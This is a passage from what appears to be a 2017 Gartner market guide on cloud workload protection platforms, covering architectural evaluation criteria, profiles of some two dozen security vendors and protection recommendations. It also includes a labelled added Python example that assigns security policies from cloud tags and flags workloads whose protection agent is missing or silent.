Technology Analysis: Deception Techniques and Technologies Create Security Technology Business
Opportunities." Some of these solutions are agent-based on the server workload and thus fall under
the scope of this research.

Signature-based antivirus. Signature-based antivirus provides little to no value on well-managed
server workloads. As stated earlier, our recommendation is to use an application control whitelisting
model as the primary control for server workload protection. One exception would be if the server
workload is serving as a general-purpose file repository, for example, a file share, a Network File
System (NFS) server, an FTP server or a SharePoint server. In these cases, the file repository should
be scanned, but this can be performed externally. Another exception would be where regulatory
requirements specify the use of antivirus and it is not negotiable with the auditor. Here, basic file
system scanning to meet compliance requirements using a minimal open-source software (OSS)
engine, such as ClamAV, is a possible strategy. Alternatively, use your incumbent endpoint antivirus
solution (configured to minimize the impact on server performance by disabling real-time scanning
and reducing the frequency of on-demand scans), which has the advantage of being managed
under the same policy management system as other endpoints.

The above CWPP capabilities are what we expect to be running within a workload. However, as
information security architects develop a complete protection strategy for server workloads, Cloud
Workload Security Services (CWSS) external to the workload that surround the workload at the data
plane layer should also be considered (see Figure 2), which are outside the scope of this research.
These optional capabilities provide application-specific protection, such as web application
firewalling (WAF), database activity monitoring, load balancing, and network-based firewalling and
IPS.

Finally, in private and public cloud-based environments, there is a set of surrounding control plane
infrastructure services that are used to provision/deprovision, configure and manage the workload.
For example, identity and access management (IAM) services, network connectivity, network
configuration and storage configuration (see Figure 2). An emerging set of vendors outside the
scope of this research provide cloud infrastructure security posture assessment (CISPA) capabilities
(e.g., Evident.io and CloudCheckr), and several of the CWPP vendors in this Market Guide have
begun offering CISPA capabilities as well.


Figure 2. Cloud Workload Protection Outside of the Workload: CWSS and CISPA

Source: Gartner (March 2017)

CWPP Architectural Considerations


When evaluating CWPP solutions, several key architectural considerations vary among the solution
providers:

Support for hybrid cloud environments. One of the most critical considerations is that the
solution work in hybrid cloud environments that span on-premises workloads, VMs, containers
and deployments in public cloud IaaS from multiple cloud providers. For enterprises that still
have physical servers, support for these may be a requirement.
Server OSs supported. Most vendors support Windows and Linux. If Linux is supported, look
for specific support of your enterprise distributions and both 32- and 64-bit support, and
whether the product is at feature parity with Windows. If Windows is supported, then clarify
which versions and whether both 32- and 64-bit versions are supported. Few vendors support
HP-UX, IBM AIX or Oracle Solaris. Some vendors also specialize in supporting out-of-support
server OSs, such as Windows 2000 Server and Windows Server 2003.
Container support. Host-based agents need to be able to distinguish and apply policies based
on individual Linux containers, including network segmentation. This is an emerging critical
requirement for organizations using containers to support microservices-style architectures and
rapid DevSecOps workflows. Three primary methods are being used to protect container-based
workloads at runtime. A more-traditional architecture with agents running in the host OS may be
used if the agent is enlightened/aware of containers. Alternatively, a "privileged" container can
be used as a peer to the other containers (a security container), with the container
management system provisioning one per physical host (see "Security
Considerations and Best Practices for Securing Containers"). Another approach is to "inject" or
layer the security controls into each container as they are constructed before release into
production.
Full API enablement. Increasingly, security protection needs to be automatically applied to
workloads in DevSecOps-style workflows. Rather than requiring expensive and slow manual
configuration via "human middleware" to configure security policy via consoles, security policy
is applied automatically via APIs using the scripts, recipes and templates common in highly
automated development environments. All functionality available in the console should be
available via APIs, and, ideally, the console is built on the vendor's APIs.
SDL integration. As enterprises shift to more-rapid DevSecOps-style development, security
scanning needs to be integrated directly into the continuous integration/continuous delivery
(CI/CD) toolchain. As new workloads are created via tools such as Chef and Puppet, or when
using cloud management platforms, such as OpenStack, the security policy can be applied
automatically via APIs.
Impact on runtime performance. Depending on the capabilities the CWPP delivers, there may
be a measurable impact on the system footprint and performance. For example, deep-packet-
inspection-based HIPS can be resource-intensive. Encryption should use hardware acceleration
capabilities, such as Intel's Advanced Encryption Standard New Instructions (AES-NI), if
available (see "Intel Data Protection Technology With AES-NI and Secure Key Delivers Fast,
Affordable Data Protection and Security"). Signature-based anti-malware scanning creates a
measurable impact on performance, if real-time scanning is kept activated, and when crawling
and scanning the file system.
"Agentless" protection. In VMware environments, multiple providers have linked into its
vSphere hypervisor APIs for agentless anti-malware scanning. One vendor, Trend Micro,
supports agentless file integrity monitoring. With VMware's NSX, agentless IPS is possible and
several vendors support this deployment option, including several CWPP vendors. With
container-based architectures, several vendors avoid traditional agents and use a privileged
container model to enforce security policy. Finally, Bracket Computing uses an innovative
"wrappering" approach that protects individual workloads without the use of agents.
Native integration and support for leading virtualization and cloud providers. For effective
protection in cloud-based environments, the CWPP should understand and integrate with native
tagging capabilities of the platform, so that policies can be applied based on these tags.
Furthermore, integration with the APIs of the cloud provider can signal the console when new
workloads have been created, potentially without security protection installed. Finally,
understanding the native segmentation of the cloud provider, such as network and security
groups, will help in defining segmentation strategies.

Page 12 of 25 Gartner, Inc. | G00302941


Management console capabilities. Full role-based access control supporting administrators
with different responsibilities should be considered mandatory across all server workloads,
regardless of location. Some vendors provide a multitenant "console in the cloud" option so
that no local management server is required. This is useful for smaller enterprises that don't
want the hassle, complexity and cost of setting up their own management server.
Compliance reporting. For organizations with specific regulatory requirements, the ability to
provide specific compliance reports reduces the workload when auditors ask for evidence of
compliance (for example, PCI and HIPAA compliance reporting).
Ability to securely bootstrap. Systems that are rapidly provisioned with security agents
embedded may not know in advance the policies that will need to be applied at runtime. The
agents should be provisioned from templates and, upon boot, securely reach out, download and
apply the appropriate policy, based on the context of the workload (e.g., the location of the
workload or its tagging).
Pricing model flexibility. The ideal solution enables the enterprise to pick and choose the mix
of licensing models that makes the most sense for them. Most vendors set prices using a
subscription model of per VM, per year. Others offer pricing per CPU socket. For highly elastic
workloads, a pricing model based on actual usage in VM or container hours or minutes, or other
usage-based metrics, may be the better choice.
Auditing and logging. All administrative activities and events in the console should be logged,
and these logs should be exportable to leading SIEM systems.
Threat intelligence and community intelligence. The vendor's lab research capabilities
should provide global threat intelligence to inform security operators of changing attack
patterns and trends, and, ideally, feed directly into its protection solution. The vendor's
customer community should enable participants to share visibility and intelligence information
to better protect from threats.
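One way to act on the native-tagging and secure-bootstrap criteria above, as an added example that is not code from the guide or from any vendor it lists: the inventory mirrors the shape of an EC2 DescribeInstances response, and the policy names, tag keys, check-in records and instance data are all constructed assumptions.

```python
"""Tag-driven policy selection and protection-gap reconciliation for cloud workloads.

Added example, not code from the Gartner guide or from any vendor it lists. It
takes a cloud inventory in the shape of an EC2 DescribeInstances response and a
CWPP console's agent check-in records, resolves the policy each workload should
pull at boot from its tags, and reports running workloads whose agent never
checked in or went quiet. Rule names, tag keys and the inventory are constructed.
"""
from dataclasses import dataclass

# Policy rules, most specific first: (tag key, tag value, policy name).
# Hypothetical names; a real console would hold these.
POLICY_RULES = [
    ("pci-scope", "true", "pci-hardened-appcontrol"),
    ("role", "fileserver", "fileserver-appcontrol-plus-av"),  # file repositories keep AV
    ("role", "web", "web-appcontrol"),
]
DEFAULT_POLICY = "baseline-appcontrol"
STALE_AFTER_SECONDS = 15 * 60  # an agent silent this long counts as a protection gap


@dataclass
class Workload:
    instance_id: str
    region: str
    security_groups: list
    tags: dict
    state: str


def parse_describe_instances(response):
    """Flatten a DescribeInstances-shaped dict into Workload records."""
    workloads = []
    for reservation in response.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            az = inst.get("Placement", {}).get("AvailabilityZone", "")
            workloads.append(Workload(
                instance_id=inst["InstanceId"],
                region=az[:-1] if az else "unknown",  # "us-east-1a" -> "us-east-1"
                security_groups=[sg["GroupId"] for sg in inst.get("SecurityGroups", [])],
                tags={t["Key"]: t["Value"] for t in inst.get("Tags", [])},
                state=inst.get("State", {}).get("Name", "unknown"),
            ))
    return workloads


def resolve_policy(workload):
    """What a freshly booted agent should download: the first matching tag rule wins."""
    for key, value, policy in POLICY_RULES:
        if workload.tags.get(key, "").lower() == value:
            return policy
    return DEFAULT_POLICY


def reconcile(response, agent_checkins, now):
    """Compare the cloud provider's inventory against the console's agent check-ins.

    agent_checkins maps instance id -> last check-in time (epoch seconds).
    Returns (assignments, gaps): the policy each running workload should carry,
    and the running workloads that have no agent check-in or a stale one.
    """
    assignments, gaps = {}, []
    for w in parse_describe_instances(response):
        if w.state != "running":
            continue  # stopped/terminated instances are not a runtime exposure
        assignments[w.instance_id] = resolve_policy(w)
        last_seen = agent_checkins.get(w.instance_id)
        if last_seen is None:
            gaps.append((w.instance_id, "no agent check-in"))
        elif now - last_seen > STALE_AFTER_SECONDS:
            gaps.append((w.instance_id, "agent check-in stale"))
    return assignments, gaps


# Constructed sample inventory in the DescribeInstances shape (not real data).
NOW = 1_700_000_000
SAMPLE_RESPONSE = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa0001", "State": {"Name": "running"},
     "Placement": {"AvailabilityZone": "us-east-1a"},
     "SecurityGroups": [{"GroupId": "sg-web01"}],
     "Tags": [{"Key": "role", "Value": "web"}]},
    {"InstanceId": "i-0bbb0002", "State": {"Name": "running"},
     "Placement": {"AvailabilityZone": "us-east-1b"},
     "SecurityGroups": [{"GroupId": "sg-web01"}],
     "Tags": [{"Key": "role", "Value": "web"}, {"Key": "pci-scope", "Value": "TRUE"}]},
    {"InstanceId": "i-0ccc0003", "State": {"Name": "running"},
     "Placement": {"AvailabilityZone": "eu-west-1a"},
     "SecurityGroups": [{"GroupId": "sg-files"}],
     "Tags": [{"Key": "role", "Value": "fileserver"}]},
    {"InstanceId": "i-0ddd0004", "State": {"Name": "stopped"},
     "Placement": {"AvailabilityZone": "eu-west-1a"},
     "SecurityGroups": [], "Tags": []},
]}]}
# Constructed agent check-ins: i-0bbb0002 never reported, i-0ccc0003 went quiet.
SAMPLE_CHECKINS = {"i-0aaa0001": NOW - 60, "i-0ccc0003": NOW - 3600}

if __name__ == "__main__":
    assignments, gaps = reconcile(SAMPLE_RESPONSE, SAMPLE_CHECKINS, NOW)
    for iid, policy in assignments.items():
        print(f"{iid}: policy {policy}")
    for iid, reason in gaps:
        print(f"GAP {iid}: {reason}")
```

The two gaps it reports are exactly the cases the criteria call out: a workload created through the cloud API with no protection installed, and an agent that stopped reporting.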

Representative Vendors
The vendors listed in this Market Guide do not constitute an exhaustive list. This section is intended to
provide more understanding of the market and its offerings.

The following vendors offer solutions designed to satisfy at least some of the requirements noted in
the previous section. The capabilities that each vendor focuses on are summarized in Table 1.

Table 1. CWPP Vendor Capability Focus Areas. "X" Indicates an Area of Focus

Vendors (columns): AWS (Amazon Inspector), Apcera, Aqua Security, Bracket Computing, Carbon Black (Cb Protection), CloudAware, Cloud Raxak, CloudPassage, Dome9, GuardiCore, HyTrust, Illumio, Kaspersky Lab, Layered Insight, McAfee, Microsoft, Qingteng, Sophos, Symantec, Threat Stack, Trend Micro, Tripwire, Twistlock, vArmour (virtual appliance)

Capability focus areas (rows): Hardening, configuration and vulnerability scanning; Network firewalling, segmentation and visibility; System integrity measurement and monitoring; Application control; Memory protection; Server EDR, HIDS and behavioral monitoring; IaaS data-at-rest encryption; HIPS with vulnerability shielding; Deception; Anti-malware scanning; Privileged account management; Change management; Log management and monitoring

Platform coverage (rows): Windows; Linux; Docker containers on Linux; Legacy Unix; VMware; AWS; Azure

[The per-vendor "X" marks did not survive extraction; the vendor descriptions that follow state each vendor's focus areas.]

Source: Gartner (March 2017)

Amazon
In 2016, AWS released an agent-based solution to scan Linux and Windows server workloads for
the presence of vulnerabilities and incorrect configuration. The agent is designed so that the scans
are implemented before workloads are placed into production in AWS, as well as scanning on-
demand, once they are in production. The agent integrates with many AWS APIs such as AWS IAM
for role-based authorization for managing assessments, the Amazon EC2 tagging API for grouping
systems and assessments, AWS CloudTrail for auditing, and Amazon SNS for workflow and
notifications related to assessments. Outside and independent of Amazon Inspector, agentless
data-at-rest encryption is available at no cost for Windows and Linux workloads via Amazon EBS
Volume Encryption. In addition, AWS Config, AWS Config Rules, Amazon CloudWatch and AWS
Multi-Factor Authentication provide additional, non-agent-based workload protection capabilities.

Apcera
Apcera provides a container management and orchestration platform for container-based
workloads, where the security is baked into its architecture. As such, it is not a traditional add-on
CWPP security solution. The use of Apcera requires the adoption of its enterprise container
management model, a decision typically driven by DevOps teams and application architectures,
not security. For security as a key stakeholder, the Apcera platform provides built-in
policy enforcement for container configuration, container lockdown, container-level network
isolation and segmentation ("nanosegmentation"), as well as full visibility, auditing, logging and
alerting of its container environment.

Aqua Security
Aqua Security is a pure-play startup focusing on the security requirements of container-based
workloads. It provides container life cycle management and protection, from development into
operations, including container management services running in AWS and Azure. In development,
Aqua integrates into the CI/CD pipeline and scans container repositories against known common
vulnerabilities and exposures (CVE), configuration and other risks. For runtime protection, rather
than use an agent in the host OS, Aqua uses an architecture in which a privileged container is run as
a peer to the other provisioned containers on the host OS. Its runtime protection includes locking
down the container runtime environment to enforce controls on namespaces, privileged access to
root, container network segmentation (nanosegmentation) and container activities based on app
control (which it refers to as behavioral whitelisting). The model is created by observing containers
during runtime and using machine learning to whitelist legitimate behavior. Significant policy
violations can be blocked, while other deviations of behavior are monitored and reported, delivering
EDR for containers.

Bracket Computing
Bracket uses an agentless wrappering approach enabled by what it calls a "metavisor" to intercept,
secure and control all network and disk communications for Linux-based VMs running in AWS. In
2016, it extended this model to Google IaaS, Microsoft Azure and VMware. Protection starts at
provisioning with preboot image authentication and integrity checking. Then, the workload wrapping
technology provides network microsegmentation and data segmentation combined with
transparent, always-on network encryption and data-at-rest encryption, including S3 encryption.
Because Bracket's approach doesn't use traditional agents, its controls cannot be disabled by
attacks from within the VM it is protecting; however, it does not yet support containers. In early
2017, it added memory introspection capabilities for Linux, protecting against memory-based
attacks and enabling memory dumps for incident response.

Carbon Black
Carbon Black's Cb Protection is best-known for its agent-based application control capabilities with
integrated memory protection, file integrity monitoring, device control and basic behavioral
monitoring for Windows and Linux workloads. It can also monitor workloads for configuration drift
from a defined gold image and stop file-based and fileless attacks by allowing only approved
software to run. In addition, it has a separately available (at additional cost) full EDR offering called
Cb Response. This is installed as a separate agent, providing more-detailed behavioral monitoring,
detection and response capabilities for advanced threats on Windows and Linux server workloads.
No specific API integration for cloud environments is provided.

CloudAware
CloudAware combines a large set of operational and security capabilities targeted at enterprises
with hybrid cloud environments spanning on-premises VMware environments and public clouds,
including AWS, Azure and Google. Its integrated offering includes inventory, cost management,
change management, configuration management, backup and replication services, as well as
integrated security capabilities. Its security capabilities can be deployed agentless or agent-based
for more control. Security agent capabilities include integrated file integrity monitoring based on
OSSEC with HIDS extensions, an integrated Nessus agent for configuration against CIS with
vulnerability assessment and an integrated Clam antivirus agent for anti-malware protection.
CloudAware also includes optional firewall management, a Breeze agent for orchestration and YARA
agent for all workloads at no additional charge. All management and security logs are consolidated
into its embedded ELK stack for single-pane-of-glass-based monitoring, management and
compliance reporting.

CloudPassage
CloudPassage has an agent-based solution with a cloud-based console for Windows and Linux,
providing vulnerability and configuration scanning, network segmentation (by managing the built-in
firewalls of the OS), system integrity monitoring, application control, and log monitoring capabilities
across any combination of public cloud, private cloud and on-premises data centers. In 2016, it
added support for container-based visibility and segmentation. It also provides basic intrusion
detection system (IDS) capabilities from its log monitoring and built-in multifactor authentication for
securing administrative access.

Cloud Raxak
Cloud Raxak has an agentless solution for Windows and Linux workloads (including support for
OpenStack and containers) that focuses primarily on secure boot and configuration management. It
measures the integrity of all Linux distributions using tools like RPM Package Manager as well as
the correct configuration of Linux and Windows as per industry standards. It is one of two vendors
that can manage TXT-based root of trust measurements for VMware environments. On systems with
bare-metal access, it leverages Intel Cloud Integrity Technology for hardware-rooted secure boot
configuration checks in cloud-based systems over the life cycle of the assets.

Dome9 Security
Dome9 has expanded its strategy to focus on agentless network security visibility and management
for AWS and Azure, which leverages the IaaS platforms' built-in security controls and corresponding
networking and security APIs. Using the AWS and Azure APIs, Dome9 can provide full network
connectivity management and visualization, IAM security visibility and management, as well as
compliance and governance management for IaaS. It also has an optional agent that provides file
integrity monitoring, networking segmentation and protection for on-premises workloads. As such,
Dome9 will increasingly compete with other CWSS and CISPA providers. Dome9 is phasing out its
agent-based solution for Windows and Linux workloads that manages the built-in firewalls of these
OSs for network segmentation.

GuardiCore
GuardiCore focuses on network visibility and segmentation, combined with process-level visibility,
reputation and deception technologies, for the detection of and response to advanced attacks in
hybrid cloud data centers, including physical servers. It can be deployed by integrating with the
underlying virtualization layer and supports deception for server workloads running on VMware
vSphere, NSX and KVM and Xen Project. Alternatively, it can be deployed in-line as a virtual
appliance. For process-based visibility, its solution requires that an agent be installed, with agents
available for Linux, Windows, AWS and Azure images and agentless using network-level integration
with VMware NSX.

HyTrust
HyTrust's core focus is providing strong separation and monitoring of administrative duties for
administrative access in virtualized environments, including controls around virtual network
(including NSX), storage, and hyperconverged, virtualized systems, such as VCE, Nutanix, VxRail,
SimpliVity, Pivot3, Cisco and OpenStack environments. Its capabilities overlap with the PAM market;
however, it offers additional CWPP capabilities, such as system integrity measurements at boot time
and granular policy controls for VMware environments. HyTrust also provides agent-based data-at-
rest encryption and key management for VM-based environments, such as IBM, Amazon, VMware,
Microsoft and others.

Illumio
Illumio has a centrally managed agent-based solution for Windows and Linux, designed primarily for
workload and application visibility and segmentation by building an application-centric network
topology map with awareness of third-party network controls, such as load balancers, network
switches, firewalls and cloud security groups. The application map is built using flow information
gathered at the host that is then used to provide network flow visibility and manage the built-in
firewalling capabilities of these OSs and enforcement points in the network and cloud. Optional
protection of these network flows using IPsec is available. Because its agent provides network flow
visibility to individual processes, it can segment, monitor for, block or alert on unexpected process-
level flows, including container-level visibility and per container network segmentation. API
integration for network switches and AWS and Azure cloud environments is provided for
configuration of segmentation enforcement.

Kaspersky Lab
Kaspersky Lab offers a server protection solution for virtualized environments protecting Windows
and Linux workloads. In VMware environments, it offers agentless anti-malware scanning for
Windows, along with a network attack blocker that provides protection from port scanning, denial-of-
service attacks, buffer-overrun attacks and other network-based attacks. In addition, for VMware,
Hyper-V, Citrix XenServer and KVM environments, it offers a hybrid lightweight or full server agent
deployment for Windows and Linux, with additional protection, such as vulnerability monitoring,
patch management and exploit prevention. For physical and public cloud Windows and Linux
servers, its full server agent must be used. It offers no native integration into AWS or Azure IaaS
environments, and it has not yet added explicit support for container-based environments.

Layered Insight
Layered Insight is a pure-play startup focusing on the security requirements of container-based
workloads, released into general availability in early 2017. It instruments its monitoring code into the
container image to add another security layer providing fine-grained visibility into what the container
is doing (e.g., network, input/output and application behaviors), as well as policy-based application
control around those actions. To build its enforcement models, it combines observed behavior with
machine learning to create custom security policies for each containerized application. Unlike other
container security solutions, it works entirely within the container image. No host kernel agent or
privileged container is required, enabling the protection to be more portable. Organizations can
interact with Layered Insight's services via web interface or JSON API, but no specific API
integration for cloud environments is provided.

McAfee
McAfee (previously Intel Security) has two differently branded offerings for cloud workload
protection. For hybrid clouds, its foundational server security suite offering brings together anti-
malware, firewalling and HIPS capabilities for Amazon, Azure, OpenStack and VMware in
multiplatform and agentless deployments. Its advanced offering also includes dynamic whitelisting
through application control, FIM through change control and volume encryption for attached cloud
storage. Both offerings are available with a perpetual licensing model; however, the advanced
offering is also available in the AWS Marketplace with usage-based pricing. Both offerings are
licensed and managed via McAfee ePolicy Orchestrator. It has not yet added visibility or security
controls for container-based environments.

Microsoft
In July 2016, Microsoft released Azure Security Center (ASC) for all customers of Azure. ASC
provides security protection, detection and response capabilities for workloads running in Azure.
ASC can work without an agent or, optionally, use Windows and Linux agents for more-detailed
visibility. The first release focuses more on runtime monitoring and reporting of VMs in Azure with
the ability for third-party security partners to easily insert their security controls into Azure, as well
as integrate their visibility and events into ASC. The base offering is free with a charge only for the
data stored and provides inventory, security posture assessment (of the workload itself and CISPA
of the surrounding Azure, such as Azure Virtual Networks, Azure SQL and Azure Web Apps) and
remediation capabilities. A fee-based version adds Microsoft-based automated monitoring of the
customer's workloads for indications of compromise, using threat intelligence, behavioral analytics
and anomaly detection. Separate optional free agents are available for IaaS full drive encryption and
Microsoft anti-malware scanning. Log management and change management are available from its
separately priced Operations Management Suite.

Qingteng
Qingteng is a China-based startup with an agent-based CWPP offering for Windows and Linux
servers focused in two areas. The first capability focuses on vulnerability and configuration
assessment of the server workload to reduce the surface area for attack. This can be done
preproduction via APIs or in production using its agent. The second capability delivers EDR and
deception capabilities for the server workloads, monitoring decoy system elements, system
behaviors and network communication patterns, which are sent to its cloud-based analytics
platform (an on-premises option is available) for analysis of indications of compromise and
correlation with its own threat intelligence. Optionally, Qingteng will monitor this as a service for its
customers at an additional charge, delivering a managed detection and response service. It does
not yet deliver security blocking or prevention capabilities, such as application control, nor does it
offer native integration with VMware, AWS or Azure. Its console and offering are focused on the
CWPP market in China, and it does not yet target organizations outside China.

Sophos
Sophos offers a number of server protection offerings, with a choice of on-premises or cloud-based
management. Sophos supports Windows, Linux and Unix with anti-malware scanning, HIPS and
Sophos Live Protection. On Windows servers, Sophos also provides server lockdown via
whitelisting, application control, device control and ransomware protection. For VMware
environments and Microsoft Hyper-V, Sophos provides an off-box, anti-malware solution for
Windows desktop and server workloads. For public cloud IaaS protection, Windows and Linux
server workloads are supported with agents, as well as native integration into AWS IaaS
environments to manage autoscaling instances. In addition, Sophos offers a network-based unified
threat management (UTM) for protecting IaaS workloads that includes firewalling, IPS and WAF
capabilities.

Symantec
Symantec's primary server protection offering is its agent-based Data Center Security (DCS). Anti-
malware scanning using the Symantec Endpoint Protection engine is included in all versions, and
can be agentless on VMware NSX and the vCloud Networking and Security/vShield platform. DCS
is available on Windows and Linux, as well as several of the legacy variants of Unix. DCS provides
network segmentation, using its built-in firewall, FIM, vulnerability-facing HIPS, application control
and behavioral control of applications. Additionally, agentless IPS can be implemented with VMware
NSX integration. In 2016, Symantec was one of the first CWPP vendors to add explicit support for
containers with DCS. However, DCS has no native integration into AWS and Azure. For cloud
environments (public and private), Symantec introduced its Windows and Linux agent-based Cloud
Workload Protection (CWP) offering in early 2017 with a cloud-based SaaS console providing
integration into the APIs of AWS and Azure, combined with optional usage-based pricing. The initial
offering focuses on the core capabilities of hardening, configuration, network firewalling, application
control and behavior monitoring. The ability to manage legacy DCS servers, HIPS, anti-malware
scanning and container support is expected in future releases.

Threat Stack
Threat Stack provides a Linux-based (and in 2016, Windows) EDR agent with a cloud-based
console for on-premises and cloud-based workloads with native integration when workloads are
running on AWS. It provides baselining and monitoring of the server workload, including file integrity
monitoring, HIDS, vulnerability management, network flow monitoring and visualization, user
behavior monitoring for privileged accounts (especially related to DevOps), and analysis of the data
for indications of threats, using its own analytics, as well as ingestion of third-party threat
intelligence. In 2016, it added support for Docker containers and can build and monitor per-
container behavioral profiles, scanning Docker repositories to build a library of predefined
behavioral models for common container-based applications. In late 2016, Threat Stack added
configuration auditing for baselining configuration policy to meet AWS and CIS benchmarks for
AWS, delivering CISPA capabilities.

Trend Micro
Trend Micro is well-known for its comprehensive server workload protection capabilities and offers
an agent-based solution with a choice of system configuration and hardening recommendations,
network segmentation, file and system integrity monitoring, vulnerability-facing HIDS/HIPS using
deep packet inspection, log analysis, and anti-malware scanning. Although it includes its own
firewalling capability, it does not directly address the needs of microsegmentation projects. It
supports a broad number of OSs, including Windows, Linux and variants of legacy Unix. In VMware
environments, these capabilities can be delivered agentless. Its policy management integrates with
the native tagging of VMware, AWS and Azure. Its latest release in early 2017 provided native
application control capabilities, as well as visibility and protection for containers, but not yet per-
container policies.

Tripwire
Tripwire is best-known for its flagship configuration assessment, file integrity and system integrity
monitoring (including application control) capabilities. Tripwire offers agent-based and agentless
solutions for a wide variety of OSs, including Windows, Linux and variants of Unix covering on-
premises, private and public cloud workload security. It has expanded to add minimal EDR
capabilities, such as behavioral monitoring. Vulnerability assessment, asset discovery, log
management, and reporting and analytics are also available as separately priced solutions. Tripwire
has integration into AWS for policy compliance, asset tagging and to enumerate assets for
scanning.

Twistlock
Twistlock is a pure-play startup focused on the security requirements of container-based workloads,
using a life cycle approach to container protection from development into operations. Rather than
use an agent in the host OS, Twistlock uses an architecture in which a privileged container is run as
a peer to the other provisioned containers on the systems. The core of its container runtime
protection is anchored in an application control model tightly controlling what can run in the
container, the resources it can access (effectively delivering file integrity monitoring) and how it
communicates using the network, delivering nanosegmentation. Behaviors are controlled using
models of standard behavior created by monitoring behaviors at runtime and applying this across
fleets of similar containers. It also provides a library of behavioral patterns for common
containerized applications, as well as an internally developed anti-malware scanning engine. No
specific API integration for cloud environments is provided.

vArmour
vArmour offers an alternative to agent-based protection solutions. vArmour's distributed system of
virtual appliances provides application-aware segmentation, visibility, deception and network-based
threat detection of on-premises and public cloud-based workloads. Its core capability combines
application visibility with stateful enforcement to create, model and measure workload
segmentation. The vArmour solution can be placed in-line with network traffic for segmentation, or
in tap mode, if only visibility and threat detection are desired. Support for container-based
environments was announced in early 2017.

Market Recommendations
The rapid adoption of private and public cloud computing models, containers and DevSecOps is
fundamentally reshaping the security requirements for protecting private and public server
workloads. The time has come for enterprises to start protecting cloud-based workloads, using a
protection strategy that is different from end-user-facing desktops and laptops. Cloud server
workload protection strategies must be based on a foundation of solid operational hygiene,
including proper administrative control, patching discipline and configuration management. With the
widespread adoption of VMs and containers, server workloads tend to be allocated to a specific
application or service. This leads to the recommendation to adopt a core workload protection
strategy anchored in reducing the surface area for attack and preventing the execution of unknown
code using application control, combined with exploit prevention and memory protection
techniques.

For servers where sensitive information is handled or stored, other types of protection beyond the
core set of capabilities (such as EDR-type monitoring) add defense in depth (see "Market Guide for
Endpoint Detection and Response Solutions"). Furthermore, if the server OS is out of support and
can't be patched (for example, Windows Server 2003), then vulnerability-facing IPS (network or
host-based) should be a key part of the protection strategy, in addition to the core application
control strategy.

Signature-based, anti-malware scanning should be deactivated (and in many cases, removed) from
all servers that don't serve as general-purpose, file-sharing repositories in favor of a whitelisting-
centric approach using application control. If regulatory requirements specify antivirus scanning and
are not negotiable, use less-frequent, file-based scanning without the performance overhead of
memory-based scanning. Alternatively, keep the agent installed, but only activated on-demand if a
scan is needed.

Gartner Recommended Reading

Some documents may not be available as part of your current Gartner subscription.

"Magic Quadrant for Endpoint Protection Platforms"

"DevSecOps: How to Seamlessly Integrate Security Into DevOps"

"Security Considerations and Best Practices for Securing Containers"

"Best Practices for Securing Workloads in Amazon Web Services"

"The Feasibility of Host-Based Controls and the Evolution of Server Security"

"How to Make Cloud IaaS Workloads More Secure Than Your Own Data Center"

"Market Guide for Endpoint Detection and Response Solutions"

"Market Guide for Privileged Access Management"

"Network Security Architectures for Virtualized Data Centers"

Evidence
"Introduction to Device Guard: Virtualization-based security and code integrity policies"

"Amazon EBS Encryption"

"Cloud Security Controls Series: Encrypting Data at Rest"

Note 1 PCI and Application Control
The PCI DSS requirement is for an anti-malware security control. QSAs should and will accept
application control directly to meet the PCI DSS requirement.

"Cb Defense Meets PCI DSS. Certified to Replace AV." Carbon Black

Note 2 VDI
VDI is a special use case in which end-user-facing endpoint sessions are hosted on a server. These
should be secured using a more-traditional endpoint security approach, in which these sessions are
kept strongly isolated from the rest of the data center network. Signature-based anti-malware
scanning should be considered mandatory. However, because these VDI sessions are hosted on
servers using virtualization platforms, agentless, anti-malware scanning solutions are often favored
to reduce resource contention.

GARTNER HEADQUARTERS

Corporate Headquarters
56 Top Gallant Road
Stamford, CT 06902-7700
USA
+1 203 964 0096

Regional Headquarters
AUSTRALIA
BRAZIL
JAPAN
UNITED KINGDOM

For a complete list of worldwide locations, visit http://www.gartner.com/technology/about.jsp

© 2017 Gartner, Inc. and/or its affiliates. All rights reserved. Gartner is a registered trademark of Gartner, Inc. or its affiliates. This
publication may not be reproduced or distributed in any form without Gartner's prior written permission. If you are authorized to access
this publication, your use of it is subject to the Usage Guidelines for Gartner Services posted on gartner.com. The information contained
in this publication has been obtained from sources believed to be reliable. Gartner disclaims all warranties as to the accuracy,
completeness or adequacy of such information and shall have no liability for errors, omissions or inadequacies in such information. This
publication consists of the opinions of Gartner's research organization and should not be construed as statements of fact. The opinions
expressed herein are subject to change without notice. Although Gartner research may include a discussion of related legal issues,
Gartner does not provide legal advice or services and its research should not be construed or used as such. Gartner is a public company,
and its shareholders may include firms and funds that have financial interests in entities covered in Gartner research. Gartner's Board of
Directors may include senior managers of these firms or funds. Gartner research is produced independently by its research organization
without input or influence from these firms, funds or their managers. For further information on the independence and integrity of Gartner
research, see Guiding Principles on Independence and Objectivity.
